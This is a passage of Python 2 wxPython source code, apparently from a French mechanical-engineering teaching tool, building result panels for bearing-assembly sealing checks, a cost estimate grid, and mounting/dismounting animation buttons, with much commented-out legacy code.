# """ Activation ou Désactivation des boutons lors d'un démontage """
#
# if self.master.analyse.elemDemonte == []:
# state = 'normal'
# else:
# state = 'disabled'
#
# for b in self.boutons.keys():
# if b[:4] <> "Anim":
# if state == 'normal':
# e = state
# else:
# e = state
# self.boutons[b].activerDesactiver(state)
# self.boutons[b].changerBulle()
#
# self.appliquerActivationDesactivation()
#
# #############################################################################
# def appliquerActivationDesactivation(self):
# for clef in self.boutons:
# if self.boutons[clef].type == 'demonte':
# self.boutons[clef]["state"] = self.etatBoutons[clef]
# ###########################################################################
# def montrerCollision(self, num):
# self.analyse.montrerCollision(n)
###########################################################################
def montrerBaguesIsolee(self, event):
if event.GetId() == 100:
p = "G"
else:
p = "D"
# print "Bagues isolées", self.analyse.obstacleBagueIsolee[p]
self.parent.montrerBagueIsolee(self.analyse.obstacleBagueIsolee[p],
self.boutons["BagueIsolee"+p].GetValue())
#####################################################
# Etanchéité ########################################
#####################################################
class ZoneEtancheite(ZoneResultats):
def __init__(self, parent, analyse):
ZoneResultats.__init__(self, parent, analyse, liaison = False)
self.Freeze()
# Etancheité statique
#####################################################
self.MakeStaticBox("1", u"Etanchéité statique")
# Resultat principal
message = analyse.resultatEtancheite["SB"]
self.Add("1", self.StaticTextMessage(message))
if "SB+" in analyse.resultatEtancheite.keys():
for mess in analyse.resultatEtancheite["SB+"]:
self.Add("1", self.StaticTextMessage(mess, style = 'Message'))
# Resultats par joint
self.MakeBoutonSizer("1",5,5)
StyleText["Titre2"].applique(self)
table = Tableau(self)
table.SetColLabelValue(0, u"Coté\ngauche")
table.SetColLabelValue(1, u"Coté\ndroit")
table.SetRowLabelValue(0, u"Sur Arbre")
table.SetRowLabelValue(1, u"Sur Alésage")
l, c = 0, 0
for p in ["G","D"]:
l = 0
for r in ["Ar","Al"]:
if analyse.resultatEtancheite["S"][p][r]:
table.SetCellValue(l,c, "X")
table.SetCellTextColour(l,c, Couleur["rouge"])
else:
table.SetCellValue(l,c, "Ok")
table.SetCellTextColour(l,c, Couleur["vert"])
l += 1
c += 1
table.Fit()
table.ForceRefresh()
self.AddBouton("1", table, (0,0), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
self.tableStat = table
# Etanchéité Dynamique
########################################################################
self.MakeStaticBox("2", u"Etanchéité dynamique")
if "DB" in analyse.resultatEtancheite:
# Résultat principal
message = analyse.resultatEtancheite["DB"]
self.Add("2", self.StaticTextMessage(message))
if "DB+" in analyse.resultatEtancheite.keys():
for mess in analyse.resultatEtancheite["DB+"]:
self.Add("2", self.StaticTextMessage(mess, style = 'Message'))
table = Tableau(self)
table.SetColLabelValue(0, u"Coté\ngauche")
table.SetColLabelValue(1, u"Coté\ndroit")
table.SetRowLabelValue(0, u"Vitesse")
table.SetRowLabelValue(1, u"Facteur PV")
# Resultat par joint
self.MakeBoutonSizer("2",5,5)
l, c = 0, 0
for p in ["G","D"]:
l = 0
for r in ["P","PV"]:
if analyse.resultatEtancheite["D"][p][r]:
table.SetCellValue(l,c, "X")
table.SetCellTextColour(l,c, Couleur["rouge"])
else:
table.SetCellValue(l,c, "Ok")
table.SetCellTextColour(l,c, Couleur["vert"])
l += 1
c += 1
table.Fit()
table.ForceRefresh()
self.AddBouton("2", table, (0,0), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
self.tableDyn = table
# self.MakeBoutonSizer("2",5,5)
# StyleText["Titre2"].applique(self)
# self.AddBouton("2", wx.StaticText(self, -1,u"Coté",style = wx.ALIGN_CENTRE), (0,1), (1,2), wx.ALIGN_CENTRE|wx.EXPAND)
# if not analyse.resultatEtancheite["J"]["G"]["Ar"]:
# self.AddBouton("2", wx.StaticText(self, -1,"gauche",style = wx.ALIGN_CENTRE), (1,1), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# if not analyse.resultatEtancheite["J"]["D"]["Ar"]:
# self.AddBouton("2", wx.StaticText(self, -1,"droit",style = wx.ALIGN_CENTRE), (1,2), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# if not (analyse.resultatEtancheite["J"]["D"]["Ar"] and analyse.resultatEtancheite["J"]["G"]["Ar"]):
# self.AddBouton("2", wx.StaticText(self, -1,"vitesse",style = wx.ALIGN_RIGHT), (2,0), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# self.AddBouton("2", wx.StaticText(self, -1,"facteur PV",style = wx.ALIGN_RIGHT), (3,0), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
#
# c = 1
# l = 2
# for p in ["G","D"]:
# if not analyse.resultatEtancheite["J"][p]["Ar"]:
# for r in ["P","PV"]:
# if analyse.resultatEtancheite["D"][p][r]:
# StyleText["Messag"].applique(self, Couleur["rouge"])
# txt = wx.StaticText(self, -1, "X",
# style = wx.ALIGN_CENTRE)
# else:
# StyleText["Messag"].applique(self, Couleur["vert"])
# txt = wx.StaticText(self, -1, "Ok",
# style = wx.ALIGN_CENTRE)
# self.AddBouton("2", txt, (l,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# l += 1
# c += 1
# l = 2
else:
pass
# Compatibilité lubrifiant
########################################################################
self.MakeStaticBox("3", u"Compatibilité lubrifiant")
message = analyse.resultatEtancheite["C"]
self.Add("3", self.StaticTextMessage(message))
self.SetSizerAndFit(self.sizer)
self.Thaw()
def initAffichage(self, zmont = None):
for b in self.boutons.values():
if isinstance(b, buttons.ThemedGenBitmapToggleButton):
self.OnClick(id = b.GetId(), act = False)
b.SetToggle(False)
#############################################################################
def lstNom(self,sens):
message = self.parent.analyse.resultatEffortAxialMtg[sens][1].mess
lst = []
pos = Montage.PositionDansPivot()
for res in self.parent.analyse.lstElemResistePas[sens]:
lst.append(pos.traduireEnTexte(res))
return {'mess' : message, 'lst' : lst}
# def OnSize(self, event = None):
# print "Resize ZoneResistance",
# print self.GetClientSizeTuple(),
# print self.GetSize()
## print self.GetClientSizeTuple()[0]
## for txt in [self.txt1,self.txt2]:
## txt.SetLabel(txt.GetLabel().replace('\n',' '))
## txt.Wrap(self.GetClientSizeTuple()[0])
# self.Fit()
# event.Skip()
def OnClick(self, event = None, id = None, act = None):
if id is None: id = event.GetId()
if id in [10,11]:
idOpp = "__Chaine"+ str(11-id)
if self.boutons.has_key(idOpp):
self.boutons[idOpp].SetToggle(False)
self.OnClick(id = 41-id, act = False)
self.parent.animerElemNonArretes(id-10)
elif id in [20,21]:
if act is None: act = event.GetIsDown()
self.parent.gererAffichageChaines(id-20, act)
elif id in [30,31]:
if act is None: act = event.GetIsDown()
self.parent.gererSurBrillanceArrets(id-30, act)
self.listeActive[id-30].Montrer(act)
self.Layout()
self.Update()
#####################################################
# Devis #############################
#####################################################
class ZoneDevis(ZoneResultats):
def __init__(self, parent, analyse):
# print "Zone ImmobAx"
ZoneResultats.__init__(self, parent, analyse, liaison = False),
# style=wx.NO_FULL_REPAINT_ON_RESIZE)
# print analyse.chaineAct[0]
if analyse.montageVide:
return
self.Freeze()
self.labels = {}
self.MakeStaticBox("1", u"Devis du montage")
# Resultat principal
#####################
# p = wx.Panel(self, -1)
self.lstElem = {}
self.devis = gridlib.Grid(self, -1, style = wx.NO_BORDER)
self.devis.CreateGrid(0, 2)
devisMtg = self.parent.mtgComplet.mtg.devis
# print devisMtg
self.devis.SetColLabelValue(0,u'Element')
self.devis.SetColLabelValue(1,u'Coût')
self.devis.SetLabelFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
# self.devis.SetLabelBackgroundColour(wx.WHITE)
self.devis.SetColLabelAlignment(wx.ALIGN_LEFT, wx.ALIGN_CENTRE)
self.devis.SetRowLabelAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)
self.devis.SetRowLabelSize(1)
self.devis.SetDefaultCellFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL, False))
self.devis.SetDefaultCellTextColour(wx.BLACK)
attrS = gridlib.GridCellAttr()
attrS.SetFont(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, True))
attrS.SetTextColour(wx.BLUE)
attrS.SetReadOnly(True)
attrN = gridlib.GridCellAttr()
attrN.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL, False))
attrN.SetTextColour(wx.BLACK)
attrN.SetAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)
attrN.SetReadOnly(True)
attrC = gridlib.GridCellAttr()
attrC.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
attrC.SetTextColour(wx.BLACK)
attrC.SetAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTER)
attrC.SetReadOnly(True)
self.devis.AppendRows()
self.devis.SetRowAttr(0, attrS)
self.devis.SetCellValue(0, 0, u"Roulements")
self.devis.SetCellValue(0, 1, u" ")
i = 1
for l in devisMtg[0:2]:
if l[1] <>0:
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrN)
self.devis.SetCellValue(i, 0, l[0].nom)
self.devis.SetCellValue(i, 1, str(l[1]))
self.lstElem[i] = l[0].pos
i += 1
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrS)
self.devis.SetCellValue(i, 0, u"Arrets axiaux")
self.devis.SetCellValue(i, 1, u" ")
i += 1
for l in devisMtg[2:10]:
if l[1] <>0:
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrN)
self.devis.SetCellValue(i, 0, l[0].nom)
self.devis.SetCellValue(i, 1, str(l[1]))
self.lstElem[i] = l[0].pos
i += 1
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrS)
self.devis.SetCellValue(i, 0, u"Etanchéité")
self.devis.SetCellValue(i, 1, u" ")
i += 1
for l in devisMtg[10:14]:
if l[1] <>0:
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrN)
self.devis.SetCellValue(i, 0, l[0].nom)
self.devis.SetCellValue(i, 1, str(l[1]))
self.lstElem[i] = l[0].pos
i += 1
for l in devisMtg[14:]:
if l[1] <>0:
self.devis.AppendRows()
self.devis.SetRowAttr(i, attrN)
self.devis.SetCellValue(i, 0, u"Chapeau support "+Const.cote2text[l[0]])
self.devis.SetCellValue(i, 1, str(l[1]))
i += 1
attrS.SetFont(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
attrS.SetTextColour(wx.BLUE)
self.devis.SetColAttr(1, attrC)
self.devis.AppendRows()
self.devis.SetCellValue(i, 0, u"TOTAL")
self.devis.SetCellFont(i, 1, wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
self.devis.SetCellFont(i, 0, wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, False))
self.devis.SetCellValue(i, 1, str(self.parent.mtgComplet.mtg.cout))
if self.parent.mtgComplet.CdCF.coutMax.get() < self.parent.mtgComplet.mtg.cout:
col = wx.RED
else:
col = wx.GREEN
self.devis.SetCellBackgroundColour(i, 1, col)
for r in range(self.devis.GetNumberRows()):
self.devis.SetRowLabelValue(r, " ")
self.devis.AutoSizeColumns()
self.devis.AutoSizeRows()
self.devis.Bind(gridlib.EVT_GRID_CELL_LEFT_CLICK, self.OnCellLeftClick)
self.Add("1", self.devis, flag = wx.ALIGN_CENTRE)
# print self.devis.GetSize()
self.devis.Fit()
self.devis.ForceRefresh()
self.SetSizerAndFit(self.sizer)
# p.SetSize(self.devis.GetSize())
# self.statBox[id].SetClientSize(p.GetSize())
self.Thaw()
self.Refresh()
def OnCellLeftClick(self, event):
r = event.GetRow()
if r in self.lstElem.keys():
self.parent.zoneMtg.surImage(self.lstElem[r])
else:
self.parent.zoneMtg.surImage()
event.Skip()
def initAffichage(self, zmont = None):
self.parent.zoneMtg.surImage()
#########################################################
# Remarques générales ###################################
#########################################################
#class ZoneRemarques(wx.Panel):
# def __init__(self, parent):
# ZoneResultats.__init__(self, parent, analyse)
#
#
#
#
# def init(self, parent):
# self.DestroyChildren()
# self.boutons = {}
#
# sizer = wx.GridBagSizer()
#
# if len(master.analyse.resultatRemarques)>0:
#
# for i in range(len(master.analyse.resultatRemarques)):
# txt = wx.StaticText(self, -1, master.analyse.resultatRemarques[i].mess)
# sizer.Add(txt, (i+1,0), (1,7))
## Label(self, text = master.analyse.resultatRemarques[i].mess, \
## font = Const.Font_CdCFValeur[0],
## fg = master.analyse.resultatRemarques[i].coul, bg = "white", \
## anchor = W, justify = LEFT , wraplength = wl*2) \
## .grid(row = i+1, column = 0, columnspan = 7,
## padx = 5, pady = 2, sticky = W)
#####################################################
# Etancheite ###########################################
#####################################################
#class ZoneEtancheite(Frame):
# def __init__(self, master = None):
# Frame.__init__(self)
#
# self.boutons = {}
# self.etatBoutons = {}
#
# self.master = master
#
# wl = 130
#
# Label(self, text = master.analyse.resultatEtancheite["M"].mess, \
# font = Const.Font_CdCFValeur[0],
# fg = master.analyse.resultatEtancheite["M"].coul, bg = "white", \
# anchor = W, justify = LEFT , wraplength = wl*2) \
# .grid(row = 0, column = 0, columnspan = 7,
# padx = 5, pady = 2, sticky = W)
#
# c = 0
# for p in ["G","D"]:
# Label(self, text = Const.cote2text[p], \
# font = Const.Font_CdCFTitre[0],
# fg = Const.Font_CdCFTitre[1],
# bg = "white", justify = CENTER, anchor = CENTER ) \
# .grid(row = 1, column = c, columnspan = 2,
# padx = 5)
#
#
# if master.analyse.resultatEtancheite[p]['pres'] is not None:
# Label(self, text = master.analyse.resultatEtancheite[p]['pres'].mess, \
# font = Const.Font_CdCFValeur[0],
# fg = master.analyse.resultatEtancheite[p]['pres'].coul, bg = "white", \
# anchor = W, justify = LEFT , wraplength = wl) \
# .grid(row = 2, column = c, columnspan = 2,
# padx = 5, pady = 2, sticky = W)
#
# if master.analyse.resultatEtancheite[p]['vitt'] is not None:
# Label(self, text = master.analyse.resultatEtancheite[p]['vitt'].mess, \
# font = Const.Font_CdCFValeur[0],
# fg = master.analyse.resultatEtancheite[p]['pres'].coul, bg = "white", \
# anchor = W, justify = LEFT , wraplength = wl) \
# .grid(row = 3, column = c, columnspan = 2,
# padx = 5, pady = 2, sticky = W)
#
# c += 2
class Tableau(gridlib.Grid):
def __init__(self, parent):
gridlib.Grid.__init__(self, parent, -1, style = wx.NO_BORDER)
self.CreateGrid(2,2)
attrS = gridlib.GridCellAttr()
attrS.SetReadOnly(True)
self.SetDefaultCellAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)
self.SetLabelBackgroundColour(wx.WHITE)
self.SetLabelFont(StyleText["Normal"].font)
self.SetDefaultCellFont(StyleText["Messag"].font)
self.SetRowAttr(0, attrS)
self.SetRowAttr(1, attrS)
self.AutoSizeRows()
##############################################################################
##############################################################################
#
# Fenêtre d'Analyse #
#
##############################################################################
##############################################################################
class TBAnalyse(wx.Treebook):
def __init__(self, parent, mtgComplet, zMont, analyse, nbCdCF):
# print "INSTANCIATION TBAnalyse"
wx.BeginBusyCursor(wx.HOURGLASS_CURSOR)
wx.Treebook.__init__(self, parent, -1,
style = wx.NB_TOP|wx.BORDER_NONE|wx.TR_HAS_BUTTONS)
self.dicTypeAnalyse = ([u"Structure du Montage", ZoneImmobAx, Icones.Icon_AnalysArret.GetBitmap()],
[u"Résistance aux Charges", ZoneResistance, Icones.Icon_AnalysEffort.GetBitmap()],
[u"Montabilité des Eléments", ZoneMontabilite, Icones.Icon_AnalysMonta.GetBitmap()],
[u"Etanchéité du montage", ZoneEtancheite, Icones.Icon_AnalysEtanch.GetBitmap()],
[u"Devis : coût indicatif", ZoneDevis, Icones.Icon_AnalysDevis.GetBitmap()])
self.parent = parent
self.nbCdCF = nbCdCF
self.Freeze()
self.InitialiserAnalyse(mtgComplet, zMont, analyse)
# print self.analyse
self.img = []
il = wx.ImageList(30, 30)
for p in self.dicTypeAnalyse:
self.img.append(il.Add(p[2]))
self.AssignImageList(il)
for p in range(len(self.dicTypeAnalyse)):
self.InitPage(p)
self.ExpandNode(0)
# # This is a workaround for a sizing bug on Mac...
# wx.FutureCall(100, self.AdjustSize)
self.Bind(wx.EVT_TREEBOOK_PAGE_CHANGED, self.OnPageChanged)
self.Bind(wx.EVT_TREEBOOK_PAGE_CHANGING, self.OnPageChanging)
self.Thaw()
wx.EndBusyCursor()
# print "FIN INSTANCIATION TBAnalyse"
def InitialiserAnalyse(self, mtgComplet, zoneMtg, analyse):
self.zoneMtg = zoneMtg
self.mtgComplet = mtgComplet
self.analyse = analyse
self.analyse.elemDemonte = []
if self.analyse.estPerimee:
self.analyse.lancerAnalyse(mtgComplet, zoneMtg)
def InitPage(self, num):
fam = self.dicTypeAnalyse[num]
page = fam[1](self, self.analyse)
self.InsertPage(num, page, fam[0], imageId = self.img[num])
# page.Layout()
# def ReplaceAllPages(self):
# self.Freeze()
# self.InitialiserAnalyse(self.mtgComplet)
# sel = self.GetSelection()
#
# self.DeleteAllPages()
# for p in range(len(self.dicTypeAnalyse)):
# self.InitPage(p)
#
# self.Layout()
## self.ChangeSelection(sel)
# self.Thaw()
def ReplacePage(self, num):
self.Freeze()
sel = self.GetSelection()
self.GetPage(num).initAffichage(self.zoneMtg)
self.InitPage(num)
self.DeletePage(num+1)
self.Layout()
self.ChangeSelection(sel)
self.Thaw()
def OnPageChanging(self, event):
self.analyse.initTraceResultats(self.zoneMtg)
try:
# self.GetPage(self.GetSelection()).initAffichage()
self.GetCurrentPage().initAffichage(self.zoneMtg)
except: pass
# self.mtgComplet.mtg.rafraichirAffichage(self.zoneMtg)
self.zoneMtg.Redessiner(self.analyse)
event.Skip()
def OnPageChanged(self, event = None):
# print "Page changed"
if self.GetSelection() == 3:
self.nbCdCF.nb.ChangeSelection(2)
elif self.GetSelection() == 1:
self.nbCdCF.nb.ChangeSelection(0)
# for p in self.GetAllPages():
# p.initAffichage()
# def InitialiserPages(self):
# for id in ["ImmAx","ResCh","Monta"]:
# fam = self.dicTypeAnalyse[id]
# self.page[id] = self.makePanel(fam[1]) #fam[1](parent)
# self.AddPage(self.page[id], fam[0])
# def InitialiserPages(self):
# for p in self.page.values():
# if not p.IsBeingDeleted():
# try:
# p.init(self.analyse)
# except AttributeError:
# p.Destroy()
# p.__init__(self, self.analyse)
# p.Layout()
def AdjustSize(self):
self.GetTreeCtrl().InvalidateBestSize()
self.SendSizeEvent()
# def makePanel(self, PanelZone):
## p = wx.Panel(self, -1)
# p = PanelZone(self, self.analyse)
## p.win = win
## def OnCPSize(evt, win=p):
## win.SetPosition((0,0))
## win.SetSize(evt.GetSize())
## p.Bind(wx.EVT_SIZE, OnCPSize)
# return p
#############################################################################
def animerElemNonArretes(self, sens):
# On efface la chaine opposée si besoin ...
sensOpp = 1-sens
chopp = self.analyse.chaineTracee[sensOpp]
if chopp is not None:
# print "On efface la chaine"
effchopp = True
self.analyse.chaineTracee[sensOpp] = None
self.zoneMtg.Redessiner(self.analyse)
else:
effchopp = False
# On effectue l'animation
self.analyse.animerManqueArret(self.zoneMtg, sens)
# On raffiche la chaine opposée si besoin ...
if effchopp:
self.analyse.chaineTracee[sensOpp] = True #self.analyse.chaineAct[sensOpp].lstLignes
self.zoneMtg.Redessiner(self.analyse)
def surbrillanceMobiles(self, sens, active):
self.GetCurrentPage().gererActivationBoutons()
self.analyse.tracerSurBrillanceMobiles(self.zoneMtg, sens ,active)
# for b in self.page["Monta"].boutons.values():
# print "Bouton :",b.tag
# if b.tag == tag:
# self.analyse.gererSurBrillanceMobiles(self.zoneMtg, tag ,active)
# else:
## self.analyse.gererSurBrillanceMobiles(self.zoneMtg, b.tag , False)
# b.Actionner(False)
# self.analyse.gererSurBrillanceMobiles(self.zoneMtg, b.tag ,False)
# self.zoneMtg.Redessiner()
#############################################################################
def montrerCollision(self, lstObs, palier = None, action = True, surBrill = False):
self.analyse.montrerCollision(self.zoneMtg, lstObs, palier, action, surBrill)
def montrerBagueIsolee(self, lstCode, active):
self.analyse.montrerCollision(self.zoneMtg, lstCode,
active = active)
#############################################################################
def animerMontage(self, tag, remonter):
# On efface la chaine opposée si besoin ...
# sensOpp = 1-sens
# chopp = self.zoneMtg.chaineTracee[sensOpp]
# if chopp is not None:
# print "On efface la chaine"
# effchopp = True
# self.zoneMtg.chaineTracee[sensOpp] = None
# self.zoneMtg.InitBuffer()
# else:
# effchopp = False
# if remonter:
# print "Remontage",
# else:
# print "Démontage",
# print tag
def collision(tag, tagOpp, remonter):
# Cas ou l'opération de montage/démontage sur le palier opposée est déja faite ...
if remonter != (tagOpp in self.analyse.elemDemonte):
return False
# Etude des collisions
if remonter:
if (tag[8] == "0" and tag[7] == "D") \
or (tag[8] == "1" and tag[7] == "G"):
return True
else:
if (tag[8] == "0" and tag[7] == "G") \
or (tag[8] == "1" and tag[7] == "D"):
return True
return False
self.operationMontage = True
lstBoutons = self.GetPage(2).boutons
if tag[4] == "R":
if self.mtgComplet.mtg.palier[tag[7]].rlt.num is None:
return
if tag[7] == "G":
tagOpp = tag[0:7] + "D" + tag[8]
elif tag[7] == "D":
tagOpp = tag[0:7] + "G" + tag[8]
if tagOpp in lstBoutons and collision(tag, tagOpp, remonter):
lstBoutons[tagOpp].Actionner(not remonter)
if tag[4] == "E" and remonter:
## print " ... déja démontés = ",self.analyse.elemDemonte
while len(self.analyse.elemDemonte) > 1:
t = self.analyse.elemDemonte[1]
if t[4] == "R":
## self.master.boutons[t].animerMontage(t,remonter)
lstBoutons[t].Actionner(not remonter)
if remonter:
self.analyse.animerMontageDemontage(self.zoneMtg, tag ,remonter)
if tag in self.analyse.elemDemonte:
self.analyse.elemDemonte.remove(tag)
# self.bulle.changer(self.listeBulle(not remonter))
else:
self.analyse.elemDemonte.append(tag)
# self.bulle.changer(self.listeBulle(not remonter))
self.analyse.animerMontageDemontage(self.zoneMtg, tag ,remonter)
self.GetCurrentPage().gererActivationBoutons()
# # On raffiche la chaine opposée si besoin ...
# if effchopp:
# self.zoneMtg.chaineTracee[sensOpp] = self.analyse.chaineAct[sensOpp].lstLignes
# self.zoneMtg.InitBuffer()
#############################################################################
def gererAffichageChaines(self, sens, afficher):
# id = event.GetId()
# print "Gestion affichage chaine",sens,":",afficher
if afficher:
self.analyse.SetTracerChaine(sens, True) #self.analyse.chaineAct[id-20].lstLignes
else:
self.analyse.SetTracerChaine(sens, None)
# print self.analyse.chaineTracee
self.zoneMtg.Redessiner(self.analyse)
###############################################################################
def gererSurBrillanceArrets(self, sens, action):
## print "SurBrillance arrets: sens",sens
### print self.lstElemResistePas[sens]
if self.analyse.elemDemonte <> []:
return
self.analyse.tracerSurbrillanceArrets(self.zoneMtg, sens, action)
self.gererAffichageChaines(sens, action)
# self.zoneMtg.InitBuffer()
################################################################################
################################################################################
class BoutonMontage(buttons.ThemedGenBitmapToggleButton):
def __init__(self, parent, tag,
typeAction, analyse,
lstObs):
if tag[:4] == "Anim":
if analyse.cdcf.bagueTournante == "I":
self.rad = "Ar"
else:
self.rad = "Al"
## sens = eval(img[8])
else:
self.rad = ""
self.typeAction = typeAction
self.parent = parent
self.analyse = analyse
self.lstObs = lstObs
self.tag = tag
if typeAction == 'demonte':
buttons.ThemedGenBitmapToggleButton.__init__(self, parent, -1,None, style = wx.BORDER_NONE)
self.SetBitmapLabel(Images.Img_BoutonMont(tag+self.rad))
self.SetBitmapSelected(Images.Img_BoutonMont(tag+self.rad+"R"))
self.SetInitialSize()
# self.SetSize(self.GetBestSize())
else:
buttons.ThemedGenBitmapToggleButton.__init__(self, parent, -1,
Images.Img_BoutonMont(tag+self.rad, True),
style = wx.BORDER_NONE)
# self.listeActive = ListeActive(self.parent, self.lstNom(lstObs), self)
# self.bulle = Const.InfoBulleDetails(self.w, self.lstNom(lstObs),
# commandEntrer = self.montrerCacherElem,
# commandQuitter = self.montrerCacherElem)
self.appliquerBulle(False)
self.SetAutoLayout(True)
self.parent.Bind(wx.EVT_BUTTON, self.OnClick, self)
############################################################################
def Actionner(self, state):
""" Simule l'action d'un Click
... avec evenement ... """
# print self.tag,self.GetValue(), state
if self.GetValue() <> state:
self.SetToggle(state)
self.OnClick(state = state)
############################################################################
def OnClick(self, event = None, state = None):
wx.BeginBusyCursor(wx.HOURGLASS_CURSOR)
if state is None: state = event.GetIsDown()
if self.typeAction == 'demonte':
self.parent.initAffichageSurbrillance()
self.parent.parent.animerMontage(self.tag, not state)
self.appliquerBulle(state)
elif self.tag[4] <> "R":# and self.GetValue():
# self.listeActive.Montrer(state)
self.parent.parent.surbrillanceMobiles(eval(self.tag[8]), state)
# if hasattr(self, "typeAction"):
# if self.tag[4] <> "R":
# surBrill = False
# else:
# surBrill = True
self.parent.parent.montrerCollision(self.lstObs,
palier = self.tag[7],
action = state, surBrill = False)
self.parent.Layout()
elif self.tag[4] == "R":# and self.GetValue():
# print "Obstacle Ensemble :",n, action
self.parent.parent.montrerCollision(self.lstObs,
palier = self.tag[7],
action = state, surBrill = True)
# print "surbrill", state
# self.listeActive.Montrer(state)
self.parent.Layout()
wx.EndBusyCursor()
# self.Refresh()
# self.Update()
# self.UpdateWindowUI()
# self.parent.Layout()
# self.parent.Update()
############################################################################
def appliquerBulle(self, state):
def listeBulle(remonter = False):
b = []
if self.tag[4] == "R" \
and self.analyse.elemDemonte == []:
b.append('EnsPasDemont')
else:
b.append('vide')
if remonter:
b.append("Rem")
else:
b.append("Dem")
b.append(self.tag[4:7])
if self.tag[4] == "R":
b.append(self.tag[7])
else:
b.append(self.rad)
if remonter:
b.append("depuis")
else:
b.append("vers")
b.append("sens"+self.tag[8])
return b
if self.typeAction == 'demonte':
txt = ''
for c in listeBulle(state):
txt += Const.bulles[c]+" "
self.SetToolTipString(txt)
else:
self.SetToolTipString(Const.bulles['AnalyMtgObs'])
############################################################################
def lstNom(self,lstObstacles):
if type(lstObstacles) == list:
if type(lstObstacles[0]) == str:
self.label = 'simple'
message = Const.MessageAnalyse('CollisionRlt').mess
else:
self.label = 'double'
message = Const.MessageAnalyse('Collision').mess
else:
self.label = 'bague'
if len(lstObstacles.keys()) == 1:
message = Const.MessageAnalyse('BagueIsolee').mess
else:
message = Const.MessageAnalyse('BaguesIsolees').mess
pos = Montage.PositionDansPivot()
lst = []
for i in lstObstacles:
strObstacles = ''
if self.label == 'double':
strObstacles += pos.traduireEnTexte(i[0]) + "\n" + pos.traduireEnTexte(i[1])
elif self.label == 'simple':
strObstacles += pos.traduireEnTexte(i)
elif self.label == 'bague':
strObstacles += Const.cote2text[i]
lst.append(strObstacles)
# print lst[0].encode('cp437','replace')
return {'mess' : message, 'lst' : lst}
# ############################################################################
# def gererSurBrillanceMobiles(self, tag = None, active = True):
# apply(Pmw.busycallback(lambda _tag = tag, _active = active :\
# self.analyse.gererSurBrillanceMobiles(tag = _tag, active = _active)))
##########################################################################################
def montrerCacherElem(self, num, act = True):
deuxCoul = True
if self.label == 'double':
lstElem = self.lstObs[num]
elif self.label == 'simple':
lstElem = [self.lstObs[num]]
elif self.label == 'bague':
deuxCoul = False
lstElem = self.lstObs[num]
self.analyse.montrerArrets(lstCode = lstElem, palier = self.tag[7], active = act,
deuxCouleurs = deuxCoul)
############################################################################
def Active(self, etat):
""" Active (ou désactive) le bouton
"""
# if state == 'normal':
# etat = self.type
# else:
# etat = state
if etat : self.Enable()
else: self.Disable()
# if self.type == 'normal':
# if etat == 'normal':
# self.SetToggle(True)
## self.w.activer()
# else:
# self.SetToggle(False)
# self.w.desactiver()
## self.etat = self.master.etatBoutons[self.img]
## self.changerBulle()
##################################################################################
##################################################################################
##class BoutonAction(BoutonBistable):
## def __init__(self, master, text = None, img = None, clefBulle = None,
## lstObs = None, messBulle = None, sens = None, relief = 'raised',
## command = None, type = 'disabled', typeBulle = None):
##
## BoutonBistable.__init__(self, master, text = text,relief = relief,
## command = command)
## self.master = master
## self.remonter = False
## self.typeBulle = typeBulle
## self.clefBulle = clefBulle
## self.img = img
##
## if img is not None and img[:4] == "Anim":
## if master.master.analyse.cdcf.bagueTournante == u"Intérieure":
## self.rad = "Ar"
## else:
## self.rad = "Al"
## sens = eval(img[8])
## else:
## self.rad = ""
##
#### print "Création boutonAction : type", typeBulle," tag",img
#### if typeBulle == 'normal':
#### self.bulle = Const.infoBulle(self, lstClef = [clefBulle], temps = 0)
##
## if typeBulle == 'mont':
## self.bulle = InfoBulle(self, Const.InfoBulleMulti,
## lstClefBulle = self.listeBulle(), temps = 0)
##
## elif typeBulle == 'detail':
## self.bulle = FrameDetails(self, lstObs, eval(img[8]), img[7])
#### if img[4] == "E":
#### self.bind('<Enter>', lambda evt = None , arg = img : \
#### self.gererSurBrillanceMobiles(evt,arg) , "+")
#### self.bind('<Leave>', lambda evt = None , arg = img : \
#### self.gererSurBrillanceMobiles(evt,arg,False) , "+")
##
#### elif typeBulle == 'spec':
#### self.bulle = Const.infoBulle(self, lstMess = messBulle, side = TOP, temps = 0)
#### self.bind('<Enter>', lambda evt = None , arg = sens : self.gererSurBrillanceArrets(evt,arg) , "+")
#### self.bind('<Leave>', lambda evt = None , arg = sens : self.gererSurBrillanceArrets(evt,arg,False) , "+")
##
## elif typeBulle == 'bagueIsolee':
## self.bulle = FrameDetails(self, lstObs, 0, "G")
##
##
## self.changerEtatDefaut(etatDefaut)
##
## if text is not None:
## self['height'] = 1
## self['width'] = 10
##
## if img is not None:
## self.afficheImage()
##
## ############################################################################
## def faireUneCroix(self):
## self['text'] = "X"
## self['relief'] = 'flat'
##
##
#### ############################################################################
#### def gererSurBrillanceMobiles(self, event = None, tag = None, active = True):
#### apply(Pmw.busycallback(lambda _tag = tag, _active = active :\
#### self.master.master.analyse.gererSurBrillanceMobiles(tag = _tag, active = _active)))
##
##
#### ############################################################################
#### def gererSurBrillanceArrets(self, event = None, sens = None, active = True):
#### self.master.master.analyse.gererSurBrillanceArrets(sens = sens, active = active)
####
##
## ############################################################################
## def activerDesactiver(self, state):
